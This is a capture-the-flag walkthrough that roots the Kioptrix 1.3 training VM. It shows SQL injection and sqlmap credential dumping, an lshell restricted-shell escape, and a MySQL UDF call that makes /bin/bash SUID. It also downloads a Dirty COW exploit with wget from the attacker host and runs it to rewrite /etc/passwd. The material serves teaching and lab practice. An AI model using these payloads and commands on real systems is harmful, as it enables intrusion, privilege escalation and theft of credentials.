KIOPTRIX Level 1.3 (#4)

Scanning

We first need to find the target. A ping sweep of the lab subnet does that (-sP is the older spelling of -sn: host discovery only, no port scan):

 $ nmap -sP 192.168.1.0/24 
​
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-15 08:12 UTC
Nmap scan report for _gateway (192.168.1.1)
Host is up (0.0028s latency).
Nmap scan report for 192.168.1.3
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.6
Host is up (0.076s latency).
Nmap scan report for 192.168.1.8
Host is up (0.0021s latency).
Nmap scan report for 192.168.1.12
Host is up (0.010s latency).
Nmap scan report for avm (192.168.1.14)
Host is up (0.00067s latency).
Nmap scan report for 192.168.1.15
Host is up (0.075s latency).
Nmap scan report for 192.168.1.100
Host is up (0.0024s latency).
Nmap done: 256 IP addresses (8 hosts up) scanned in 3.03 seconds

Target IP is 192.168.1.15

Nmap

 $ nmap -A -Pn 192.168.1.15 -oN nmap.scan
 
 # Nmap 7.60 scan initiated Fri May 15 08:22:12 2020 as: nmap -A -Pn -oN nmap.scan 192.168.1.15
 Nmap scan report for 192.168.1.15
 Host is up (0.017s latency).
 Not shown: 566 closed ports, 430 filtered ports
 PORT    STATE SERVICE     VERSION
 22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
 | ssh-hostkey:
 |   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
 |_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
 80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
 |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 |_http-title: Site doesn't have a title (text/html).
 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Host script results:
 |_clock-skew: mean: -24d02h55m48s, deviation: 0s, median: -24d02h55m48s
 |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb-os-discovery:
 |   OS: Unix (Samba 3.0.28a)
 |   Computer name: Kioptrix4
 |   NetBIOS computer name:
 |   Domain name: localdomain
 |   FQDN: Kioptrix4.localdomain
 |_  System time: 2020-04-21T01:28:29-04:00
 | smb-security-mode:
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 |_smb2-time: Protocol negotiation failed (SMB2)
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Fri May 15 08:24:19 2020 -- 1 IP address (1 host up) scanned in 127.09 seconds

Findings : OpenSSH 4.7p1 on 22, Apache 2.2.8 with PHP 5.2.4 (Suhosin patch) on 80, and Samba 3.0.28a on 139/445. All of it is a 2008-era Ubuntu stack, and SMB accepted a guest session with message signing disabled, so both the web server and SMB are worth enumerating.

Scanning web server with dirb

 $ dirb http://192.168.1.15 | tee dirb.scan
 
 -----------------
 DIRB v2.22
 By The Dark Raver
 -----------------
 
 START_TIME: Fri May 15 08:40:56 2020
 URL_BASE: http://192.168.1.15/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612
 
 ---- Scanning URL: http://192.168.1.15/ ----
 + http://192.168.1.15/cgi-bin/ (CODE:403|SIZE:327)                                                      
 ==> DIRECTORY: http://192.168.1.15/images/                                                              
 + http://192.168.1.15/index (CODE:200|SIZE:1255)                                                        
 + http://192.168.1.15/index.php (CODE:200|SIZE:1255)                                                    
 ==> DIRECTORY: http://192.168.1.15/john/                                                                
 + http://192.168.1.15/logout (CODE:302|SIZE:0)                                                          
 + http://192.168.1.15/member (CODE:302|SIZE:220)                                                        
 + http://192.168.1.15/server-status (CODE:403|SIZE:332)                                                 
 
 
 ---- Entering directory: http://192.168.1.15/images/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 
 ---- Entering directory: http://192.168.1.15/john/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
     (Use mode '-w' if you want to scan it anyway)
 
 -----------------
 END_TIME: Fri May 15 08:41:15 2020

Nikto Scan

 $ nikto -host 192.168.1.15 | tee nikto.scan
 - Nikto v2.1.5
 ---------------------------------------------------------------------------
 + Target IP:          192.168.1.15
 + Target Hostname:    192.168.1.15
 + Target Port:        80
 + Start Time:         2020-05-15 08:44:06 (GMT0)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
 + The anti-clickjacking X-Frame-Options header is not present.
 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
 + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3268: /icons/: Directory indexing found.
 + OSVDB-3268: /images/: Directory indexing found.
 + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
 + Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
 + OSVDB-3233: /icons/README: Apache default file found.
 + Cookie PHPSESSID created without the httponly flag
 + 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
 + End Time:           2020-05-15 08:44:46 (GMT0) (40 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested

SMB enumeration with enum4linux

 $ enum4linux.pl 192.168.1.15 | tee enum4linx.scan
 WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.        
 WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.        
 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 09:35:46 2020
 
 
  ==========================                                                                             
 |    Target Information    |                                                                            
  ==========================                                                                             
 Target ........... 192.168.1.15                                                                         
 RID Range ........ 500-550,1000-1050                                                                    
 Username ......... ''                                                                                   
 Password ......... ''                                                                                   
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 ...............
 ...............
 S-1-22-1-1001 Unix User\john (Local User)
 S-1-22-1-1002 Unix User\robert (Local User)
 
  =============================================
 |    Getting printer info for 192.168.1.15    |
  =============================================
 mkdir failed on directory /var/run/samba/msg.lock: Permission denied
 No printers returned.
 enum4linux complete on Fri May 15 09:37:03 2020

Filtering the user account lines from the scan above:

 $ cat enum4linx.scan | grep Account
 index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody    Desc: (null)
 index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert   Name: ,,,       Desc: (null)
 index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root     Name: root      Desc: (null)
 index: 0x4 RID: 0xbba acb: 0x00000010 Account: john     Name: ,,,       Desc: (null)
 index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret       Name: loneferret,,,     Desc: (null)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)

Users found : robert, root, john, loneferret

Scan with dirsearch

 $ dirsearch.py -u http://192.168.1.15 -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=
 
  _|. _ _  _  _  _ _|_    v0.3.
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                          
 Extensions: php, asp, aspx, jsp, html, zip, jar, sql | HTTP method: get | Threads: 10 | Wordlist size: 8679                                                                                                     
 Error Log: /home/ajay/tools/dirsearch/logs/errors-20-05-15_08-47-32.log                                                                                                                                         
 Target: http://192.168.1.15                                                                                                                                                                                     
 [08:47:32] Starting:
 [08:47:38] 403 -  323B  - /.hta
 [08:47:38] 403 -  330B  - /.ht_wsr.txt
 .....
 .....
 [08:49:57] 302 -  220B  - /member/login.html  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.jar  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.sql  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.py  ->  index.php
 [08:49:57] 302 -  220B  - /member/login.rb  ->  index.php
 [08:49:57] 302 -  220B  - /member/logon  ->  index.php
 [08:49:57] 302 -  220B  - /member/signin  ->  index.php
 [08:50:31] 403 -  333B  - /server-status/
 [08:50:31] 403 -  332B  - /server-status
 
 Task Completed

Filtering the output

 $ cat dirsearchReport | grep 200
 
 200   109B   http://192.168.1.15:80/checklogin.php
 200   109B   http://192.168.1.15:80/checklogin
 200   298B   http://192.168.1.15:80/database.sql
 200     1KB  http://192.168.1.15:80/index
 200     1KB  http://192.168.1.15:80/index.php
 200     1KB  http://192.168.1.15:80/index.php/login/

There is a database.sql on the server (http://192.168.1.15/database.sql). It holds one credential pair:

username    john
password    1234

These credentials do not work on the Member Login page; the live members table has different passwords, as the sqlmap dump below shows.

SQL injection : Fuzzing the Member Login form shows that the password field is injectable. Submitting the username john with the password ' or 1='1 --+ logs us in, and the success page displays the account's real credentials, john / MyNameIsJohn. The same injection point is what sqlmap uses below to dump the whole table.
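As an added example (not part of the original writeup), here is the injection above reproduced against an in-memory SQLite copy of the members table. The query string is an assumption: the page shows only the first 15 lines of checklogin.php, so the example builds the WHERE clause the way such scripts typically do, by pasting the POST fields into the SQL text. The page's payload is ' or 1='1 --+ (the --+ suffix is the usual way to write a trailing SQL comment in input that gets URL-decoded); it relies on MySQL coercing the string '1' to a number so that 1='1' is true. SQLite does not coerce, so the example uses the quoted form '1'='1' for the working demo and keeps the MySQL-only form to show the difference. The parameterised query beside it is the fix.

```python
import sqlite3

# Rows sqlmap dumped from the members table, used here as constructed test data.
MEMBERS = [
    (1, "john", "MyNameIsJohn"),
    (2, "robert", "ADGAdsafdfwt4gadfga=="),
]

# The page's payload is  ' or 1='1 --+  (--+ becoming a trailing comment once
# the input is decoded).  MySQL coerces '1' to a number, so 1='1' is true there;
# SQLite compares an integer and a string as unequal, so this demo uses the
# quoted form and keeps the MySQL form to show the difference.
PAYLOAD = "' or '1'='1' -- "
MYSQL_ONLY_PAYLOAD = "' or 1='1' -- "


def make_db():
    """In-memory stand-in for the members database on the target."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return conn


def build_vulnerable_query(username, password):
    """Build the query the way checklogin.php is assumed to: the POST fields
    are pasted straight into the SQL text (assumption; the page only shows the
    first 15 lines of the script, not the query itself)."""
    return ("SELECT username, password FROM members "
            f"WHERE username='{username}' and password='{password}'")


def vulnerable_login(conn, username, password):
    """Return the first matching (username, password) row, or None.
    With PAYLOAD the WHERE clause becomes
      username='john' and password='' or '1'='1' -- '
    which is true for every row, so the first row (john) comes back."""
    rows = conn.execute(build_vulnerable_query(username, password)).fetchall()
    return rows[0] if rows else None


def safe_login(conn, username, password):
    """Same lookup with bound parameters: the payload is compared as a literal
    password string and matches nothing."""
    rows = conn.execute(
        "SELECT username, password FROM members WHERE username=? and password=?",
        (username, password),
    ).fetchall()
    return rows[0] if rows else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("john", PAYLOAD))
    print("vulnerable   :", vulnerable_login(db, "john", PAYLOAD))
    print("parameterised:", safe_login(db, "john", PAYLOAD))
    print("mysql-only form under sqlite:", vulnerable_login(db, "john", MYSQL_ONLY_PAYLOAD))
```

Run it and the vulnerable function returns john's row for any username, the parameterised one returns nothing for the payload, and the MySQL-only form returns nothing under SQLite, which is why a payload that works on one engine is worth re-testing on another.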

SQLMap

 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit"
 
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dbs
 
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 [*] information_schema
 [*] members
 [*] mysql
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --tables -D members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 Database: members
 [1 table]
 +---------+                                                                                             
 | members |
 +---------+
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --columns -D members -T members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 Database: members
 Table: members
 [3 columns]
 +----------+-------------+                                                                              
 | Column   | Type        |
 +----------+-------------+                                                                              
 | id       | int(4)      |
 | password | varchar(65) |
 | username | varchar(65) |
 +----------+-------------+
 
 
 $ sqlmap -u "http://192.168.1.15/checklogin.php" --data="myusername=john&mypassword=12345&submit=Login" --dump -D members -T members
 sqlmap got a 302 redirect to 'http://192.168.1.15:80/login_success.php?username=john'. Do you want to follow? [Y/n] y
 redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
 [16:12:12] [INFO] retrieved: 1
 [16:12:13] [INFO] retrieved: MyNameIsJohn
 [16:12:25] [INFO] retrieved: john
 [16:12:29] [INFO] retrieved: 2
 [16:12:30] [INFO] retrieved: ADGAdsafdfwt4gadfga==
 [16:12:48] [INFO] retrieved: robert
 Database: members
 Table: members
 [2 entries]
 +----+----------+-----------------------+
 | id | username | password              |
 +----+----------+-----------------------+
 | 1  | john     | MyNameIsJohn          |
 | 2  | robert   | ADGAdsafdfwt4gadfga== |
 +----+----------+-----------------------+

The dump gives plaintext credentials for both users (the application stores passwords unhashed):

john   / MyNameIsJohn
robert / ADGAdsafdfwt4gadfga==

John's pair also works for SSH, which drops us into a restricted shell:

 $ ssh john@192.168.1.15
 john@192.168.1.15's password:
 Welcome to LigGoat Security Systems - We are Watching
 == Welcome LigGoat Employee ==
 LigGoat Shell is in place so you  don't screw up
 Type '?' or 'help' to get the list of allowed commands
 john:~$
 john:~$ help
 cd  clear  echo  exit  help  ll  lpath  ls
Result : regular user account access, in a restricted shell.

Privilege Escalation

Only the commands listed by help work; anything else is rejected as unknown:

 john:~$ ls -al
 total 28
 drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
 drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
 -rw------- 1 john john 1133 2020-04-21 01:08 .bash_history
 -rw-r--r-- 1 john john  220 2012-02-04 18:04 .bash_logout
 -rw-r--r-- 1 john john 2940 2012-02-04 18:04 .bashrc
 -rw-r--r-- 1 john john 3105 2020-04-21 01:08 .lhistory
 -rw-r--r-- 1 john john  586 2012-02-04 18:04 .profile
 john:~$ pwd
 *** unknown command: pwd
 john:~$ cat /etc/passwd
 *** unknown command: cat

Leaving the home directory is a forbidden path. The first attempt costs a warning, the second one ends the session:

 john:~$ cd ..
 *** forbidden path -> "/home/"
 *** You have 0 warning(s) left, before getting kicked out.
 This incident has been reported.
 john:~$ cd ..
 *** forbidden path -> "/home/"
 *** Kicked out
 Connection to 192.168.1.15 closed.

Malformed input does more than print an error, though. echo $) produces a Python traceback and drops the connection:

 john:~$ echo $)
 /bin/sh: Syntax error: ")" unexpected
 Traceback (most recent call last):
   File "/bin/kshell", line 27, in <module>
     lshell.main()
   File "/usr/lib/python2.5/site-packages/lshell.py", line 1219, in main
     cli.cmdloop()
   File "/usr/lib/python2.5/site-packages/lshell.py", line 410, in cmdloop
     stop = self.onecmd(line)
   File "/usr/lib/python2.5/site-packages/lshell.py", line 531, in onecmd
     func = getattr(self, 'do_' + cmd)
   File "/usr/lib/python2.5/site-packages/lshell.py", line 134, in __getattr__
     if self.check_path(self.g_line) == 1:
   File "/usr/lib/python2.5/site-packages/lshell.py", line 327, in check_path
     item = cout.readlines()[0].split(' ')[0].strip()
 IndexError: list index out of range
 Connection to 192.168.1.15 closed.

The traceback tells us what the restricted shell is: /bin/kshell is a wrapper around lshell (/usr/lib/python2.5/site-packages/lshell.py), a restricted shell written in Python that passes parts of the input line to /bin/sh for its path check. Since Python is interpreting our input, try to get it to spawn a shell:

 john:~$ os.system("/bin/sh")
 *** unknown command: os.system("/bin/sh")
 john:~$

That is rejected as an unknown command. Prefixing the same Python call with a command lshell does allow (ls here) gets the line past its command check, and os.system() then spawns an unrestricted bash, visible from the prompt changing to bash-3.2$:

 john:~$ ls os.system("/bin/bash")
 bash-3.2$
 bash-3.2$ pwd
 /home/john
 bash-3.2$

Now try to get a root shell

 bash-3.2$ whoami
 john
 bash-3.2$ sudo su
 [sudo] password for john:
 john is not in the sudoers file.  This incident will be reported.
 bash-3.2$

john is not in sudoers, so sudo is out and we need another route.

Enumerating the System

Operating system and kernel version:

 bash-3.2$ cat /etc/issue
 Welcome to LigGoat Security Server
 
 bash-3.2$ cat /etc/lsb-release
 DISTRIB_ID=Ubuntu
 DISTRIB_RELEASE=8.04
 DISTRIB_CODENAME=hardy
 DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
 
 bash-3.2$ uname -a
 Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Enumerating files with the sticky, SGID and SUID bits set:

 # sticky-bit directories
 $ find / -perm -1000 -type d 2>/dev/null
 /var/spool/samba
 /var/spool/cron/atjobs
 /var/spool/cron/atspool
 /var/spool/cron/crontabs
 /var/lib/php5
 /var/lib/samba/usershares
 /var/tmp
 /var/lock
 /dev/shm
 /tmp
 
 # SGID files
 $ find / -perm -g=s -type f 2>/dev/null
 /usr/bin/wall
 /usr/bin/expiry
 /usr/bin/crontab
 /usr/bin/bsd-write
 /usr/bin/mlocate
 /usr/bin/at
 /usr/bin/chage
 /usr/bin/ssh-agent
 /usr/sbin/uuidd
 /sbin/unix_chkpwd
 
 # SUID files
 $ find / -perm -u=s -type f 2>/dev/null
 /usr/lib/apache2/suexec
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/openssh/ssh-keysign
 /usr/lib/pt_chown
 /usr/bin/chsh
 /usr/bin/sudo
 /usr/bin/traceroute6.iputils
 /usr/bin/newgrp
 /usr/bin/sudoedit
 /usr/bin/chfn
 /usr/bin/arping
 /usr/bin/gpasswd
 /usr/bin/mtr
 /usr/bin/passwd
 /usr/bin/at
 /usr/sbin/pppd
 /usr/sbin/uuidd
 /lib/dhcp3-client/call-dhclient-script
 /bin/mount
 /bin/ping6
 /bin/fusermount
 /bin/su
 /bin/ping
 /bin/umount
 /bin/bash
 /sbin/umount.cifs
 /sbin/mount.cifs

Nothing here is a known escalation helper; if a binary such as vim, nmap or find carried the SUID bit it could be made to run commands as root, and sudo is unusable without a sudoers entry. One entry does deserve a second look: /bin/bash is in the SUID list. A stock /bin/bash is not SUID, and a SUID-root bash is a root shell by itself via bash -p (as used in Method 1 below), so check the owner and mode of any such entry before dismissing the list.
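As an added example, not from the original writeup: the triage described above done in code. find_setuid is the live equivalent of the find command (walk the filesystem, keep regular files with the SUID bit), and triage splits a SUID list into binaries known to hand out a root shell when they are SUID root, and everything else. ESCALATORS is a constructed short list rather than a complete one, and PAGE_SUID_LIST is the output printed above, embedded so the script runs without access to the box; on that list it flags /bin/bash.

```python
import os
import stat

# Binaries that give a root shell, or root-level file read/write, when they
# carry the SUID bit and are owned by root.  Constructed short list for the
# example; it is not complete.
ESCALATORS = {
    "bash", "sh", "dash", "zsh", "ksh", "python", "python2", "python3",
    "perl", "ruby", "php", "vim", "vi", "nano", "less", "more", "find",
    "nmap", "awk", "gawk", "env", "cp", "mv", "tar", "tee", "dd", "socat",
}

# The SUID list printed above, embedded as constructed input so the script
# runs without access to the target.
PAGE_SUID_LIST = """
/usr/lib/apache2/suexec /usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign /usr/lib/pt_chown /usr/bin/chsh /usr/bin/sudo
/usr/bin/traceroute6.iputils /usr/bin/newgrp /usr/bin/sudoedit /usr/bin/chfn
/usr/bin/arping /usr/bin/gpasswd /usr/bin/mtr /usr/bin/passwd /usr/bin/at
/usr/sbin/pppd /usr/sbin/uuidd /lib/dhcp3-client/call-dhclient-script
/bin/mount /bin/ping6 /bin/fusermount /bin/su /bin/ping /bin/umount /bin/bash
/sbin/umount.cifs /sbin/mount.cifs
""".split()


def is_setuid(mode):
    """True when a mode word carries the set-user-ID bit (the 's' in -rwsr-xr-x)."""
    return bool(mode & stat.S_ISUID)


def find_setuid(root="/"):
    """Live equivalent of  find / -perm -u=s -type f 2>/dev/null : walk the
    tree from root and keep regular files with the SUID bit.  Directories we
    cannot read are skipped instead of aborting the walk, like 2>/dev/null."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and is_setuid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def triage(paths):
    """Split a SUID list into (escalators, others).  escalators are entries
    whose basename is in ESCALATORS; a SUID-root file there is a direct root
    shell, e.g. /bin/bash via  bash -p .  The rest still deserves a manual
    look but is usually the normal set (passwd, su, mount, ping, ...)."""
    escalators = [p for p in paths if os.path.basename(p) in ESCALATORS]
    others = [p for p in paths if p not in escalators]
    return escalators, others


if __name__ == "__main__":
    flagged, rest = triage(PAGE_SUID_LIST)
    print("worth a closer look:", flagged)
    print("remaining SUID files:", len(rest))
```

On a live box, replace PAGE_SUID_LIST with find_setuid("/"); the walk is slower than find but needs nothing beyond the Python that lshell already revealed is installed.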

Look for processes running as root:

 bash-3.2$ ps aux | grep root
 
 root      4623  0.0  0.0   1716   488 tty5     Ss+  14:20   0:00 /sbin/getty 38400 tty5
 root      4627  0.0  0.0   1716   488 tty2     Ss+  14:20   0:00 /sbin/getty 38400 tty2
 root      4629  0.0  0.0   1716   484 tty3     Ss+  14:20   0:00 /sbin/getty 38400 tty3
 root      4632  0.0  0.0   1716   488 tty6     Ss+  14:20   0:00 /sbin/getty 38400 tty6
 root      4690  0.0  0.0   1872   544 ?        S    14:20   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/km
 root      4711  0.0  0.0   5316   984 ?        Ss   14:20   0:00 /usr/sbin/sshd
 root      4767  0.0  0.0   1772   524 ?        S    14:20   0:00 /bin/sh /usr/bin/mysqld_safe
 root      4809  0.0  1.5 126988 16232 ?        Sl   14:20   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/
 root      4811  0.0  0.0   1700   556 ?        S    14:20   0:00 logger -p daemon.err -t mysqld_safe -i -t mysql
 root      4884  0.0  0.1   6528  1328 ?        Ss   14:20   0:00 /usr/sbin/nmbd -D

mysqld is running as root (started from mysqld_safe as root rather than as the mysql user). The web root holds the application's database credentials:

 bash-3.2$ cd /var/www
 bash-3.2$ ls
 checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
 bash-3.2$ cat checklogin.php | head -n15
 <?php
 ob_start();
 $host="localhost"; // Host name
 $username="root"; // Mysql username
 $password=""; // Mysql password
 $db_name="members"; // Database name
 $tbl_name="members"; // Table name
 
 // Connect to server and select databse.
 mysql_connect("$host", "$username", "$password")or die("cannot connect");
 mysql_select_db("$db_name")or die("cannot select DB");
 
 // Define $myusername and $mypassword
 $myusername=$_POST['myusername'];
 $mypassword=$_POST['mypassword'];
 bash-3.2$

The application connects to MySQL as root with an empty password. The same credentials work from the shell (press Enter at the password prompt):

 bash-3.2$ mysql -u root -p
 Enter password:
 Welcome to the MySQL monitor.  Commands end with ; or \g.
 Your MySQL connection id is 7
 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
 Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
 mysql> show databases;
 +--------------------+
 | Database           |
 +--------------------+
 | information_schema |
 | members            |
 | mysql              |
 +--------------------+
 3 rows in set (0.00 sec)
 
 mysql>

Gaining Root

Method 1 : MySQL UDF

Because mysqld runs as root, anything a MySQL user-defined function executes also runs as root. Registering sys_exec from lib_mysqludf_sys.so (the library already sits where the server can load it; nothing is uploaded here) and calling it to set the SUID bit on /bin/bash is enough:

 mysql> use mysql;
 mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
 mysql> select sys_exec('chmod u+s /bin/bash');
 mysql> quit

Back in the shell, /bin/bash is now SUID root. Bash drops an effective UID that differs from the real UID at startup unless it is started with -p, so bash -p gives the root prompt:

 bash-3.2$ ls -al /bin/bash
 -rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
 bash-3.2$ bash -p
 bash-3.2# whoami
 root
 bash-3.2# cd /root
 bash-3.2# ls
 congrats.txt  lshell-0.9.12
 bash-3.2# cat congrats.txt
 Congratulations!
 You've got root.
 
 There is more then one way to get root on this system. Try and find them.
 I've only tested two (2) methods, but it doesn't mean there aren't more.
 As always there's an easy way, and a not so easy way to pop this box.
 Look for other methods to get root privileges other than running an exploit.
 
 It took a while to make this. For one it's not as easy as it may look, and
 also work and family life are my priorities. Hobbies are low on my list.
 Really hope you enjoyed this one.
 
 If you haven't already, check out the other VMs available on:
 www.kioptrix.com
 
 Thanks for playing,
 loneferret

Method 2 : Dirty COW kernel exploit

The kernel is 2.6.24 (Ubuntu 8.04), which falls inside the range affected by Dirty COW (CVE-2016-5195, a race condition in the kernel's copy-on-write handling present since 2.6.22), so a kernel exploit also works here.

Exploit link : https://www.exploit-db.com/exploits/40839

This exploit writes a new UID 0 user, firefart, over the root line of /etc/passwd with a password you choose (it backs the original file up to /tmp/passwd.bak and reminds you to restore it). The Kioptrix VM has no gcc, so compile on the attacking machine for the target's 32-bit i686 architecture (on a 64-bit attacker add -m32, which needs gcc-multilib) and transfer the binary. Compilation, as given in the exploit's header:

 $ gcc -pthread exploit.c -o exploit -lcrypt

Serve the binary from the attacking machine (192.168.1.8:8000 here; the compiled file was renamed dirty_cow for the transfer), fetch it on the target and run it:

 bash-3.2$ cd /tmp
 bash-3.2$ wget http://192.168.1.8:8000/dirty_cow
 bash-3.2$ ./dirty_cow
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password:
 Complete line:
 firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
 
 mmap: b7f0e000
 madvise 0
 
 ptrace 0
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

The exploit prompts for the new user's password (12345 here). Switch to the new account with su; the 'Failed to add entry' message does not stop the switch, and whoami confirms we are firefart, with UID 0:

 bash-3.2$ su firefart
 Password:
 Failed to add entry for user firefart.
 
 firefart@Kioptrix4:/home/john# whoami
 firefart
 firefart@Kioptrix4:/home/john# cd /root
 firefart@Kioptrix4:~# ls
 congrats.txt  lshell-0.9.12
 firefart@Kioptrix4:~# cat congrats.txt
 Congratulations!
 You've got root.
 
 There is more then one way to get root on this system. Try and find them.
 I've only tested two (2) methods, but it doesn't mean there aren't more.
 As always there's an easy way, and a not so easy way to pop this box.
 Look for other methods to get root privileges other than running an exploit.
 
 It took a while to make this. For one it's not as easy as it may look, and
 also work and family life are my priorities. Hobbies are low on my list.
 Really hope you enjoyed this one.
 
 If you haven't already, check out the other VMs available on:
 www.kioptrix.com
 
 Thanks for playing,
 loneferret
 
 firefart@Kioptrix4:~#
